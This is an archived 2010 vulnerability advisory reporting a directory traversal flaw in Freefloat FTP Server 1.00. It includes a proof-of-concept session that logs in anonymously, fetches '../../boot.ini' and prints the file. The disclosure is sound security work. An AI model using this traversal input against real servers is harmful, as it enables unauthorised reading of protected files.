Freefloat FTP Server 1.00 Directory Traversal

2010-12-06T00:00:00
ID PACKETSTORM:96423
Type packetstorm
Reporter Pr0T3cT10n
Modified 2010-12-06T00:00:00

Description

                                        
                                            `# _ ____ __ __ ___  
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |  
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /  
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /  
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/   
# Live by the byte |_/_/   
#  
# Members:  
#  
# Pr0T3cT10n  
# -=M.o.B.=-  
# TheLeader  
# Sro  
# Debug  
#  
# Contact: inv0ked.israel@gmail.com  
#  
# -----------------------------------  
# Freefloat FTP Server is vulnerable for a path traversal, the following will explain you how to read files  
# The vulnerability allows an unprivileged attacker to read files whom he has no permissions to.  
# The vulnerable FTP command are:  
# * GET - Read File  
#-----------------------------------  
# Vulnerability Title: Freefloat FTP Server v1.00 Remote Directory Traversal Vulnerability  
# Date: 06/12/2010  
# Author: Pr0T3cT10n  
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip  
# Affected Version: 1.00  
# Tested on Windows XP Hebrew, Service Pack 3  
# ISRAEL, NULLBYTE.ORG.IL  
###  
C:\Documents and Settings\Admin>ftp 127.0.0.1  
Connected to 127.0.0.1.  
220 FreeFloat Ftp Server (Version 1.00).  
User (127.0.0.1:(none)): anonymous  
331 Password required for anonymous.  
Password:  
230 User anonymous logged in.  
ftp> GET ../../boot.ini  
200 PORT command successful.  
150 Opening BINARY mode data connection for \boot.ini(211 bytes).  
226 Transfer complete.  
ftp: 211 bytes received in 0.00Seconds 211000.00Kbytes/sec.  
ftp> bye  
221 Goodbye  
  
C:\Documents and Settings\Admin>type boot.ini  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
[operating systems]  
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"  
/noexecute=optin /fastdetect  
  
`